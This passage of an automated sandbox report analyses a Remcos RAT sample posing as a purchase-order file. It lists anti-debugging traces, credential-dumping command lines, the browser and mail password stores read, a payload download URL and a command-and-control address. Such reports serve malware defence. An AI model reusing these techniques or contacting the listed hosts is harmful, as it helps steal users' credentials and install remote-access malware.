              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00444E71 push ecx; ret 9_2_00444E81
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00414060 push eax; ret 10_2_00414074
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00414060 push eax; ret 10_2_0041409C
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00414039 push ecx; ret 10_2_00414049
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_004164EB push 0000006Ah; retf 10_2_004165C4
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00416553 push 0000006Ah; retf 10_2_004165C4
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00416555 push 0000006Ah; retf 10_2_004165C4
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: \purchase order draft for atps inq ref240912887-atps.exe
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: \purchase order draft for atps inq ref240912887-atps.exe
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: \purchase order draft for atps inq ref240912887-atps.exe
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: \purchase order draft for atps inq ref240912887-atps.exe
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: \purchase order draft for atps inq ref240912887-atps.exeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: \purchase order draft for atps inq ref240912887-atps.exeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: \purchase order draft for atps inq ref240912887-atps.exeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: \purchase order draft for atps inq ref240912887-atps.exeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_004047CB
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeAPI/Special instruction interceptor: Address: 7B611E3
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeAPI/Special instruction interceptor: Address: 48111E3
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeRDTSC instruction interceptor: First address: 7AFF385 second address: 7AFF385 instructions: 0x00000000 rdtsc 0x00000002 cmp cl, dl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F45152C2376h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a cmp dl, bl 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeRDTSC instruction interceptor: First address: 47AF385 second address: 47AF385 instructions: 0x00000000 rdtsc 0x00000002 cmp cl, dl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4514EF74C6h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a cmp dl, bl 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeAPI coverage: 4.3 %
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeAPI coverage: 10.0 %
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405814
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_004062CF FindFirstFileW,FindClose,0_2_004062CF
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_00402770 FindFirstFileW,5_2_00402770
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405814
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_004062CF FindFirstFileW,FindClose,5_2_004062CF
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_382A10F1
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,5_2_382A6580
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0040AE51 FindFirstFileW,FindNextFileW,8_2_0040AE51
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407EF8
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407898
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00418981 memset,GetSystemInfo,8_2_00418981
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832600827.00000000076A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeAPI call chain: ExitProcess graph end nodegraph_0-4788
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeAPI call chain: ExitProcess graph end nodegraph_0-4789
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeAPI call chain: ExitProcess graph end nodegraph_9-34112
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401752
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_382A60E2
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_004062F6 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062F6
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A4AB4 mov eax, dword ptr fs:[00000030h]5_2_382A4AB4
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A724E GetProcessHeap,5_2_382A724E
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_382A60E2
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_382A2639
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_382A2B1C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: NULL target: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: NULL target: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: NULL target: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\rhjrpro"Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\cjobhkzbwg"Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\edcuicjcrowul"Jump to behavior
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832600827.00000000076E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832600827.00000000076E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\%
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832600827.00000000076E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832600827.00000000076E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832600827.00000000076E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerI
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832600827.00000000076E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager[
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832600827.00000000076E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A2933 cpuid 5_2_382A2933
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_382A2264
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,9_2_004082CD
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00405FAE GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405FAE
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000005.00000002.2832600827.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2852514486.000000003788F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: ESMTPPassword9_2_004033F0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword9_2_00402DB3
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword9_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe PID: 6752, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21Jump to behavior
              Source: Yara matchFile source: 00000005.00000002.2832600827.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2852514486.000000003788F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              1
              Credentials In Files
              228
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets231
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Access Token Manipulation
              Cached Domain Credentials4
              Process Discovery
              VNCGUI Input Capture112
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
              Process Injection
              DCSync1
              System Owner/User Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576145 Sample: Purchase Order Draft for AT... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 27 geoplugin.net 2->27 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Detected unpacking (changes PE section rights) 2->45 47 10 other signatures 2->47 8 Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe 1 31 2->8         started        signatures3 process4 file5 23 C:\Users\user\AppData\Local\...\System.dll, PE32 8->23 dropped 11 Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe 3 15 8->11         started        process6 dnsIp7 29 162.251.122.87, 2404, 49792, 49798 UNREAL-SERVERSUS Canada 11->29 31 geoplugin.net 178.237.33.50, 49799, 80 ATOM86-ASATOM86NL Netherlands 11->31 33 66.63.187.30, 49776, 80 ASN-QUADRANET-GLOBALUS United States 11->33 25 C:\ProgramData\remcos\logs.dat, data 11->25 dropped 49 Detected Remcos RAT 11->49 51 Maps a DLL or memory area into another process 11->51 53 Installs a global keyboard hook 11->53 16 Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe 1 11->16         started        19 Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe 1 11->19         started        21 Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe 2 11->21         started        file8 signatures9 process10 signatures11 35 Tries to steal Instant Messenger accounts or passwords 16->35 37 Tries to harvest and steal browser information (history, passwords, etc) 16->37 39 Tries to steal Mail credentials (via file / registry access) 19->39

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe8%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://66.63.187.30/hpVMAPRZVuaX36.bin0%Avira URL Cloudsafe
              http://www.skinstudio.netG0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                  high
                  http://66.63.187.30/hpVMAPRZVuaX36.binfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.google.comPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exefalse
                    high
                    https://www.google.com/accounts/serviceloginPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exefalse
                      high
                      https://login.yahoo.com/config/loginPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exefalse
                        high
                        http://www.imvu.comrPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852972867.0000000038270000.00000040.10000000.00040000.00000000.sdmpfalse
                          high
                          http://nsis.sf.net/NSIS_ErrorErrorPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000000.00000000.1569620221.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                            high
                            http://www.nirsoft.net/Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exefalse
                              high
                              http://www.skinstudio.netGPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmp, Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000000.2357104183.000000000044A000.00000002.00000001.01000000.00000003.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852972867.0000000038270000.00000040.10000000.00040000.00000000.sdmpfalse
                                high
                                http://www.ebuddy.comPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exefalse
                                  high
                                  http://www.imvu.comPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exefalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    66.63.187.30
                                    unknownUnited States
                                    8100ASN-QUADRANET-GLOBALUSfalse
                                    178.237.33.50
                                    geoplugin.netNetherlands
                                    8455ATOM86-ASATOM86NLfalse
                                    162.251.122.87
                                    unknownCanada
                                    64236UNREAL-SERVERSUStrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1576145
                                    Start date and time:2024-12-16 15:25:12 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:11
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                    Detection:MAL
                                    Classification:mal100.phis.troj.spyw.evad.winEXE@9/18@1/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
